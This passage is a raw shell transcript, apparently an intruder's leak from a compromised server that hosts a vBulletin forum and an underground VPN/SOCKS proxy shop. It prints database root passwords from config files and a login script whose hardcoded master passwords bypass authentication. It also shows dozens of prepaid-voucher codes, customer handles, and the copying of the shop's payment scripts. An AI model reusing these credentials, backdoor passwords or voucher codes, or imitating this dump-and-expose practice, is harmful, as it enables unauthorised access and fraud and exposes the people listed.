+-rw-r--r-- 1 root root 61 Apr 23 2010 uploadprogress.gif +-rw-r--r-- 1 root root 39049 Apr 23 2010 usercp.php +-rw-r--r-- 1 root root 20969 Apr 23 2010 usernote.php +drwxr-xr-x 12 root root 4096 Jul 8 2010 vb +-rw-r--r-- 1 root root 27814 Apr 23 2010 visitormessage.php +-rw-r--r-- 1 root root 1660 Apr 23 2010 widget.php +-rw-r--r-- 1 root root 3656 Apr 23 2010 xmlsitemap.php + +# cat includes/config.php +<?php +/*======================================================================*\ +|| #################################################################### || +|| # vBulletin 4.0.3 Patch Level 1 +|| # ---------------------------------------------------------------- # || +|| # All PHP code in this file is ?2000-2010 vBulletin Solutions Inc. # || +|| # This file may not be redistributed in whole or significant part. # || +|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # || +|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # || +|| #################################################################### || +\*======================================================================*/ + +/*-------------------------------------------------------*\ +| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** | ++---------------------------------------------------------+ +| If you get any errors while attempting to connect to | +| MySQL, you will need to email your webhost because we | +| cannot tell you the correct values for the variables | +| in this file. | +\*-------------------------------------------------------*/ + + // ****** DATABASE TYPE ****** + // This is the type of the database server on which your vBulletin database will be located. + // Valid options are mysql and mysqli, for slave support add _slave. Try to use mysqli if you are using PHP 5 and MySQL 4.1+ + // for slave options just append _slave to your preferred database type. +$config['Database']['dbtype'] = 'mysql'; + + // ****** DATABASE NAME ****** + // This is the name of the database where your vBulletin will be located. + // This must be created by your webhost. +$config['Database']['dbname'] = 'forum'; + + // ****** TABLE PREFIX ****** + // Prefix that your vBulletin tables have in the database. +$config['Database']['tableprefix'] = ''; + + // ****** TECHNICAL EMAIL ADDRESS ****** + // If any database errors occur, they will be emailed to the address specified here. + // Leave this blank to not send any emails when there is a database error. +$config['Database']['technicalemail'] = 'admin@scenecms.org'; + + // ****** FORCE EMPTY SQL MODE ****** + // New versions of MySQL (4.1+) have introduced some behaviors that are + // incompatible with vBulletin. Setting this value to "true" disables those + // behaviors. You only need to modify this value if vBulletin recommends it. +$config['Database']['force_sql_mode'] = false; + + + + // ****** MASTER DATABASE SERVER NAME AND PORT ****** + // This is the hostname or IP address and port of the database server. + // If you are unsure of what to put here, leave the default values. +$config['MasterServer']['servername'] = 'localhost'; +$config['MasterServer']['port'] = 3306; + + // ****** MASTER DATABASE USERNAME & PASSWORD ****** + // This is the username and password you use to access MySQL. + // These must be obtained through your webhost. +$config['MasterServer']['username'] = 'root'; +$config['MasterServer']['password'] = 'QkZorIZZC5e'; + + // ****** MASTER DATABASE PERSISTENT CONNECTIONS ****** + // This option allows you to turn persistent connections to MySQL on or off. + // The difference in performance is negligible for all but the largest boards. + // If you are unsure what this should be, leave it off. (0 = off; 1 = on) +$config['MasterServer']['usepconnect'] = 0; + + + + // ****** SLAVE DATABASE CONFIGURATION ****** + // If you have multiple database backends, this is the information for your slave + // server. If you are not 100% sure you need to fill in this information, + // do not change any of the values here. +$config['SlaveServer']['servername'] = ''; +$config['SlaveServer']['port'] = 3306; +$config['SlaveServer']['username'] = ''; +$config['SlaveServer']['password'] = ''; +$config['SlaveServer']['usepconnect'] = 0; + + + + // ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ****** + // This setting allows you to change the name of the folders that the admin and + // moderator control panels reside in. You may wish to do this for security purposes. + // Please note that if you change the name of the directory here, you will still need + // to manually change the name of the directory on the server. +$config['Misc']['admincpdir'] = 'admincp'; +$config['Misc']['modcpdir'] = 'modcp'; + + // Prefix that all vBulletin cookies will have + // Keep this short and only use numbers and letters, i.e. 1-9 and a-Z +$config['Misc']['cookieprefix'] = 'bb'; + + // ******** FULL PATH TO FORUMS DIRECTORY ****** + // On a few systems it may be necessary to input the full path to your forums directory + // for vBulletin to function normally. You can ignore this setting unless vBulletin + // tells you to fill this in. Do not include a trailing slash! + // Example Unix: + // $config['Misc']['forumpath'] = '/home/users/public_html/forums'; + // Example Win32: + // $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3'; +$config['Misc']['forumpath'] = '/var/www/scenecms.org/web/board'; + + + + // ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ****** + // The users specified here will be allowed to view the admin log in the control panel. + // Users must be specified by *ID number* here. To obtain a user's ID number, + // view their profile via the control panel. If this is a new installation, leave + // the first user created will have a user ID of 1. Seperate each userid with a comma. +$config['SpecialUsers']['canviewadminlog'] = '1'; + + // ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ****** + // The users specified here will be allowed to remove ("prune") entries from the admin + // log. See the above entry for more information on the format. +$config['SpecialUsers']['canpruneadminlog'] = '1'; + + // ****** USERS WITH QUERY RUNNING PERMISSIONS ****** + // The users specified here will be allowed to run queries from the control panel. + // See the above entries for more information on the format. + // Please note that the ability to run queries is quite powerful. You may wish + // to remove all user IDs from this list for security reasons. +$config['SpecialUsers']['canrunqueries'] = ''; + + // ****** UNDELETABLE / UNALTERABLE USERS ****** + // The users specified here will not be deletable or alterable from the control panel by any users. + // To specify more than one user, separate userids with commas. +$config['SpecialUsers']['undeletableusers'] = ''; + + // ****** SUPER ADMINISTRATORS ****** + // The users specified below will have permission to access the administrator permissions + // page, which controls the permissions of other administrators +$config['SpecialUsers']['superadministrators'] = '1'; + + // ****** DATASTORE CACHE CONFIGURATION ***** + // Here you can configure different methods for caching datastore items. + // vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php + // vB_Datastore_APC - to use APC + // vB_Datastore_XCache - to use XCache + // vB_Datastore_Memcached - to use a Memcache server, more configuration below +// $config['Datastore']['class'] = 'vB_Datastore_Filecache'; + + // ******** DATASTORE PREFIX ****** + // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more + // than one set of forums installed on your host, you *may* need to use a prefix + // so that they do not try to use the same variable within the cache. + // This works in a similar manner to the database table prefix. +// $config['Datastore']['prefix'] = ''; + + // It is also necessary to specify the hostname or IP address and the port the server is listening on +/* +$config['Datastore']['class'] = 'vB_Datastore_Memcached'; +$i = 0; +// First Server +$i++; +$config['Misc']['memcacheserver'][$i] = '127.0.0.1'; +$config['Misc']['memcacheport'][$i] = 11211; +$config['Misc']['memcachepersistent'][$i] = true; +$config['Misc']['memcacheweight'][$i] = 1; +$config['Misc']['memcachetimeout'][$i] = 1; +$config['Misc']['memcacheretry_interval'][$i] = 15; +*/ + +// ****** The following options are only needed in special cases ****** + + // ****** MySQLI OPTIONS ***** + // When using MySQL 4.1+, MySQLi should be used to connect to the database. + // If you need to set the default connection charset because your database + // is using a charset other than latin1, you can set the charset here. + // If you don't set the charset to be the same as your database, you + // may receive collation errors. Ignore this setting unless you + // are sure you need to use it. +// $config['Mysqli']['charset'] = 'utf8'; + + // Optionally, PHP can be instructed to set connection parameters by reading from the + // file named in 'ini_file'. Please use a full path to the file. + // Example: + // $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini'; +$config['Mysqli']['ini_file'] = ''; + +// Image Processing Options + // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings. +$config['Misc']['maxwidth'] = 2592; +$config['Misc']['maxheight'] = 1944; + +/*======================================================================*\ +|| #################################################################### +|| # +|| # CVS: $RCSfile$ - $Revision: 32878 $ +|| #################################################################### +\*======================================================================*/ + +# cd /var/www/vpn24.org/ && ls -la +total 120 +drwxr-xr-x 3 root root 4096 Dec 13 22:18 . +drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. +-rw-r--r-- 1 root root 35 May 9 2010 index.php +-rwxr-xr-x 1 root root 18378 Nov 8 19:00 testVicSocks +drwxr-xr-x 9 www-data root 86016 Jan 8 02:41 web + +# cd web + +# ls -la | grep -v cookie.txt +total 3296 +drwxr-xr-x 9 www-data root 86016 Jan 8 02:41 . +drwxr-xr-x 3 root root 4096 Dec 13 22:18 .. +-rw-r--r-- 1 www-data www-data 6413 Dec 11 07:33 21Kms__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Jan 3 18:07 5Liter__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 4 17:35 AtzePeng__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 1 10:29 BloodySunday__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 17 12:39 Delphinko__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 15 18:47 DieFliege__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 28 19:38 DingDong__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 15 13:59 Emrano__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 8 20:14 EsseX__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 6 20:22 Firewall__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 20 11:18 HohesC__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 23 14:28 ICHICH__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 11 17:53 Janitor1__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 27 14:04 KaLLi__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 5 12:17 Keineloe__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 10 17:26 Lognot__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 3 20:11 Maxim__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 1 14:35 MysticSun__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 27 08:53 QuickSilver__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 24 01:01 Selfcut__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 19 20:52 SlamD__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 18 14:05 Sparkasse__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 14 13:19 TheKing__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Jan 1 22:54 Tiberius1__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 23 15:04 WeArEoNe__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 13 10:02 __splittingError.htm +-rw-r--r-- 1 www-data root 257 Nov 18 20:01 abo.php +-rw-r--r-- 1 root root 5186 Nov 4 20:46 abo_lu.php +-rw-r--r-- 1 root root 5186 Nov 4 20:46 abo_ru.php +-rw-r--r-- 1 www-data root 4508 Nov 18 20:43 account.php +-rw-r--r-- 1 www-data www-data 6412 Nov 14 07:33 analytics__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 18 12:36 andreas7411__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 16 11:40 asdfghjkl__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 9 10:37 b0uNz__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 15 17:38 b14ckf1ag__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 2 02:09 b2323__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 11 13:43 b7233__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 11 19:37 bLackftw1989__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 9 13:49 becks__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 12 15:42 beware__splittingError.htm +-rw-r--r-- 1 www-data root 1209 Jan 26 2010 buy.php +-rw-r--r-- 1 www-data www-data 6412 Dec 6 13:12 c4sh1__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 8 18:10 cardercarder__splittingError.htm +drwxrwxrwx 3 www-data root 36864 Jan 7 18:38 cashIn +-rw-r--r-- 1 www-data root 393 Nov 18 20:29 cashin.php +-rw-r--r-- 1 root root 1291 Nov 18 19:05 check_one_vsocks5123213.php +-rw-r--r-- 1 root root 2219 Nov 12 00:15 checkvsocks.php +-rw-r--r-- 1 www-data www-data 6412 Nov 11 22:01 crack__splittingError.htm +-rw-r--r-- 1 www-data www-data 1063 Dec 27 16:40 dbg.html +-rw-r--r-- 1 www-data www-data 6412 Nov 21 15:48 djdalio__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 10 22:27 docscanner__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 17 14:41 duden__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 1 14:38 dudex__splittingError.htm +-rw-r--r-- 1 www-data www-data 1063 Dec 27 16:11 dump.html +-rw-r--r-- 1 www-data www-data 6412 Dec 3 13:45 enosaires__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 30 11:16 epoepo__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 20 19:41 erebos1337__splittingError.htm +-rw-r--r-- 1 www-data root 311 Nov 18 20:21 faq.php +-rw-r--r-- 1 root root 1406 Nov 18 23:11 favicon.ico +-rw-r--r-- 1 www-data www-data 6412 Dec 14 13:24 frankylo__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 14 16:48 fuckdawn__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 24 16:14 hackbart2__splittingError.htm +-rw-r--r-- 1 root root 967 Aug 3 19:00 handleVsocks.php +-rw-r--r-- 1 www-data www-data 6412 Dec 13 00:18 hans2000__splittingError.htm +-rw-r--r-- 1 root root 56 May 11 2010 hdf2.php +-rw-r--r-- 1 www-data root 1064 Jul 17 14:33 header.php +-rw-r--r-- 1 root root 950 Nov 18 21:54 header2.php +-rw-r--r-- 1 www-data www-data 6412 Dec 13 15:32 hexst4tic__splittingError.htm +-rw-r--r-- 1 www-data root 1380 Aug 23 01:44 home.php +-rw-r--r-- 1 root root 178 Nov 15 18:01 home2.php +-rw-r--r-- 1 www-data www-data 6412 Nov 9 20:00 hund123456__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 22 18:04 iKas2__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 7 19:15 iiyama__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 13 10:08 ikarus22__splittingError.htm +drwxr-xr-x 2 www-data root 4096 Nov 4 21:36 images +drwxr-xr-x 2 root root 4096 Nov 18 21:45 images2 +-rw-r--r-- 1 root root 10646 Nov 18 23:16 index.php +-rw-r--r-- 1 root root 4299 Nov 18 21:26 indexORIGINALbss213123123.php +-rw-r--r-- 1 www-data www-data 6411 Nov 16 15:37 jensmaul__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 15 19:51 joeee__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 17 21:01 jojo187__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 15 23:53 jojoman__splittingError.htm +-rw-r--r-- 1 www-data www-data 4853 Nov 23 15:15 juicestin__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 24 20:33 juliasutter__splittingError.htm +-rw-r--r-- 1 www-data www-data 6515 Dec 1 23:49 kackpfosten__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 17 20:07 keystyle__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 8 14:21 kirmi__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 10 18:42 klaudio__splittingError.htm +drwxr-xr-x 2 www-data root 4096 Nov 20 13:42 koksundnuTTen88 +-rw-r--r-- 1 www-data www-data 6411 Dec 14 13:32 kucke17__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 10 05:37 latestnews__splittingError.htm +-rw-r--r-- 1 root root 156 Nov 18 19:10 listallvsocks62342134543.php +-rw-r--r-- 1 www-data root 1421 May 9 2010 listssh.php +-rw-r--r-- 1 www-data root 1781 Nov 18 20:28 listvpn.php +-rw-r--r-- 1 root root 1245 May 15 2010 loadssh.php +-rw-r--r-- 1 www-data www-data 1630 May 6 2010 login.php +-rw-r--r-- 1 root root 7442 Nov 18 20:27 lu_abo.php +-rw-r--r-- 1 root root 1274 Nov 4 21:05 lu_loadssh.php +-rw-r--r-- 1 root root 3126 Nov 18 20:17 lu_socks5.php +-rw-r--r-- 1 www-data www-data 6412 Jan 3 16:19 magi007__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 23 21:56 makko__splittingError.htm +drwxr-xr-x 2 root root 4096 Dec 23 12:15 moneystream +-rw-r--r-- 1 www-data root 182 May 10 2010 mysql.php +-rw-r--r-- 1 root root 3879 Nov 18 20:27 newProxie.php +-rw-r--r-- 1 www-data root 596 Nov 18 20:07 news.php +-rw-r--r-- 1 www-data root 362 May 6 2010 news_overview.php +-rw-r--r-- 1 root root 380 Nov 15 17:58 news_overview2.php +-rw-r--r-- 1 www-data www-data 6412 Nov 18 12:24 nitex__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 14 19:08 offlinejack__splittingError.htm +drwxr-xr-x 2 www-data root 36864 Jan 7 19:58 ovpn +-rw-r--r-- 1 www-data www-data 6412 Dec 7 19:56 pablo__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 10 20:04 pan1c__splittingError.htm +-rw-r--r-- 1 www-data www-data 6512 Dec 7 22:57 pappe223__splittingError.htm +-rw-r--r-- 1 root root 1326 Aug 24 19:30 poll.php +-rw-r--r-- 1 www-data www-data 6411 Dec 14 14:07 pscBastard__splittingError.htm +-rw-r--r-- 1 root root 256 Sep 13 16:27 pscashin.php +-rw-r--r-- 1 www-data www-data 6409 Jan 7 23:47 pwnny__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 19 19:59 pyrodeath__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 14 16:24 qqqqqq__splittingError.htm +-rw-r--r-- 1 www-data root 2817 Nov 18 22:46 register.php +-rw-r--r-- 1 www-data www-data 6412 Dec 29 17:02 reideen__splittingError.htm +-rw-r--r-- 1 root root 7157 Nov 18 20:26 ru_abo.php +-rw-r--r-- 1 root root 1262 Nov 4 21:05 ru_loadssh.php +-rw-r--r-- 1 root root 3025 Nov 18 20:16 ru_socks5.php +-rw-r--r-- 1 www-data root 1196 Nov 24 17:32 saveReq.php +-rw-r--r-- 1 www-data root 5125 Aug 29 16:29 shop.php +-rw-r--r-- 1 www-data www-data 6412 Dec 10 14:33 shore__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 3 20:35 slic3menic3__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 15 22:18 snowghost__splittingError.htm +-rw-r--r-- 1 www-data root 263 Nov 18 20:16 socks5.php +-rw-r--r-- 1 root root 574 Oct 7 18:54 socksdetails.php +-rw-r--r-- 1 www-data www-data 6412 Nov 9 16:10 spran__splittingError.htm +-rw-r--r-- 1 www-data root 3104 Nov 18 20:20 styles.css +drwxr-xr-x 2 root root 4096 Oct 21 18:25 suPPortPanel18 +-rw-r--r-- 1 www-data www-data 6412 Dec 23 16:07 sunrise__splittingError.htm +-rw-r--r-- 1 www-data root 1336 Nov 18 20:53 support.php +-rw-r--r-- 1 www-data www-data 6412 Jan 2 16:36 test569__splittingError.htm +-rw-r--r-- 1 root root 171 May 12 2010 time.php +-rw-r--r-- 1 www-data www-data 6412 Nov 11 18:38 traden90__splittingError.htm +-rw-r--r-- 1 root root 139 Dec 28 14:21 ukashin.php +-rw-r--r-- 1 root root 2118 Nov 18 20:25 uvsocks.php +-rw-r--r-- 1 www-data www-data 6412 Dec 15 07:03 vpn24__splittingError.htm +-rw-r--r-- 1 www-data root 799 May 6 2010 vsocks.php +-rw-r--r-- 1 www-data www-data 6412 Dec 28 14:25 w333d__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 14 17:17 winkel72__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 8 12:53 xc0re__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 11 11:52 xxx3xxx4__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 4 16:45 zezol__splittingError.htm + +# cat *splittingError.htm | grep "Failed</td>" +<tr><td>6337180255464896366</td><td>Failed</td><td>100.00</td></tr> +<tr><td>6337180253212809062</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180252076434686</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180253299398565</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180257214002899</td><td>Failed</td><td>3.00</td></tr> +<tr><td>6337180259183915580</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180252532009429</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180250390679390</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6330949130319304248</td><td>Failed</td><td>30.00</td></tr> +<tr><td>6337180259379552429</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180258343754368</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180256917976433</td><td>Failed</td><td>2.14</td></tr> +<tr><td>6337180251009203952</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180111553585578</td><td>Failed</td><td>4.00</td></tr> +<tr><td>6337180258177204589</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180253681177082</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180259073857611</td><td>Failed</td><td>3.00</td></tr> +<tr><td>6337180256462965609</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180115155785437</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180394582246475</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180258243666274</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180256212540975</td><td>Failed</td><td>50.00</td></tr> +<tr><td>6337180257735545855</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180250238018710</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180250936554560</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180258032831998</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180113239640306</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180259568330264</td><td>Failed</td><td>50.00</td></tr> +<tr><td>6337180254636279981</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180255605913872</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251576728091</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180254761736029</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251140051070</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180258955781559</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180255901612889</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180252316842391</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180255645832702</td><td>Failed</td><td>50.00</td></tr> +<tr><td>6337180253814896822</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6330302815447899096</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180119686732454</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180253644660265</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180257110264619</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180115155785437</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180254730527152</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180259238856011</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180280592431563</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180253125392792</td><td>Failed</td><td>15.00</td></tr> +<tr><td>6337180258269992836</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180253244887904</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180258751189123</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6637180305761777189</td><td>Failed</td><td>25.00</td></tr> +<tr><td>6337180250114063863</td><td>Failed</td><td>15.00</td></tr> +<tr><td>6337180251763555456</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180250613878779</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180258831608324</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180254951300131</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180251480953489</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180257200821070</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180252910471233</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180250992167067</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180113591950418</td><td>Failed</td><td>5.92</td></tr> +<tr><td>6337180253935682366</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180254837540264</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251213933840</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180253734200352</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180257051176442</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180259341246183</td><td>Failed</td><td>2.00</td></tr> +<tr><td>6337180250165411383</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6332347911381552324</td><td>Failed</td><td>2.00</td></tr> +<tr><td>6337180254171009637</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180250833220976</td><td>Failed</td><td>15.00</td></tr> +<tr><td>6337180258930519133</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180253725306614</td><td>Failed</td><td>1.30</td></tr> +<tr><td>7180254095966078633</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180258930519133</td><td>Failed</td><td>6.44</td></tr> +<tr><td>6337180255646619421</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6637180250951262628</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180255706618537</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6331780259351713338</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180251207309429</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251260723060</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180254766958230</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251903818657</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180254440921646</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180256430792556</td><td>Failed</td><td>15.00</td></tr> +<tr><td>6337180256307519041</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251553897605</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180256373444637</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180114065134794</td><td>Failed</td><td>8.00</td></tr> + +# cat mysql.php +<?php + $server = "localhost"; + $user = "root"; + $pass = "QkZorIZZC5e"; + $database = "vpn24"; + + mysql_connect($server,$user,$pass); + + if(!$install) + mysql_select_db($database); +?> + +# crazy fuckin masterpassword^C +# cat login.php + +<?php + +if(isset($_SESSION['cmuser'])) + echo("<div style=''>Sie sind bereits eingeloggt als ".$_SESSION['cmuser']."</div>"); +else if(isset($_POST['log'])) +{ + $user = mysql_real_escape_string($_POST['user']); + $pass = mysql_real_escape_string($_POST['pass']); + + if($pass == "koksundnuTTen88" || $pass == "suPPort_masterPass88") + $res = mysql_query("SELECT * FROM cmuser WHERE name='$user'"); + else + $res = mysql_query("SELECT * FROM cmuser WHERE name='$user' AND pass='".md5($pass)."'"); + + $arr = mysql_fetch_array($res); + + if(mysql_num_rows($res) == 0) + die("<div style=''>Konnte dieses User/Passwort Paar nicht finden</div>"); + + $_SESSION['cmuser'] = $arr['name']; + $_SESSION['cmid'] = $arr['id']; + $_SESSION['cmpass'] = md5($pass); + $_SESSION['pPass'] = $arr['privPass']; + $_SESSION['pUser'] = $arr['privUser']; + $_SESSION['poll'] = $arr['poll']; + echo("<div style=''>Sie sind nun eingeloggt als <b>".$_SESSION['cmuser']."</b></div>"); + +} +else +{ +echo <<< END +<div style=""> +<div style="font-weight:bold;font-size:1.7em;">Login</div> +<table> +<form action="index.php?do=login" method="post"> +<tr> +<td>User:</td><td><input class="cInp" type="text" name="user"></td> +</tr> +<tr> +<td>Pass:</td><td><input class="cInp" type="password" name="pass"></td> +</tr> +<br> +</table><br> +<input type="submit" name="log" value="Einloggen"> +</form> +<br><br> +Noch keinen Account? Gleich <a href="index.php?do=register">registrieren</a> +</div> +END; + +} +?> + +# tar cvjf /tmp/cashin.tar.bz2 cashIn/*.php +cashIn/eeeeeeeeee.php +cashIn/myOne.php +cashIn/myukashcombine.php +cashIn/oldPSC.php +cashIn/psc.php +cashIn/ukash666.php +cashIn/ukash_convert666.php + +# cd koksundnuTTen88/ && ls -la +total 152 +drwxr-xr-x 2 www-data root 4096 Nov 20 13:42 . +drwxr-xr-x 9 www-data root 86016 Jan 8 02:41 .. +-rw-r--r-- 1 root root 1112 Nov 7 16:29 add5daysadsdsadsayfdsa.php +-rw-r--r-- 1 root root 511 Nov 13 12:48 asd21938uasd213dsa.php +-rw-r--r-- 1 root root 483 Aug 28 02:27 deletevsdata.php +-rw-r--r-- 1 root root 78 Nov 10 20:19 deletevsdata_noreset.php +-rw-r--r-- 1 root root 508 Aug 28 02:45 getAUserCreditsBack.php +-rw-r--r-- 1 root root 235 Jun 25 2010 getSocksUserWithoutAbo.php +-rw-r--r-- 1 root root 441 Jun 28 2010 getVPNUserWithoutAbo.php +-rw-r--r-- 1 root root 14 Jul 10 19:58 index.html +-rw-r--r-- 1 root root 724 Aug 9 17:43 insertShop.php +-rw-r--r-- 1 root root 450 Nov 4 20:29 lu_getVPNUserWithoutAbo.php +-rw-r--r-- 1 root root 5255 Nov 9 20:43 psc.php +-rw-r--r-- 1 www-data root 101 May 7 2010 style.css +-rw-r--r-- 1 www-data root 1924 May 7 2010 viewSupport.php +-rw-r--r-- 1 root root 2021 Nov 9 20:42 viewVsocksSupport.php + +# cat psc.php +<?php + + include("../mysql.php"); + + $res = mysql_query("SELECT 